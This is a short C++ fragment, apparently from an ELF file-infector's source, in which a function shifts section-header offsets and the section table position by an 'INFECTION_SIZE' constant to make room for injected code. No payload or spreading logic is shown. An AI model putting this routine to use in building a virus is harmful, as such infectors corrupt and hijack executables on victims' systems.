bool Target::patchShdr()
{
  unsigned nr = p.ehdr->e_shnum;
  Elf32_Shdr* shdr = (Elf32_Shdr*)(p.b + p.ehdr->e_shoff);
  while(nr-- > 0)
  {
    if (shdr->sh_offset > top)
      shdr->sh_offset += INFECTION_SIZE;
    shdr++;
  }
  p.ehdr->e_shoff += INFECTION_SIZE;
  return true; /* this implementations can't fail */
}
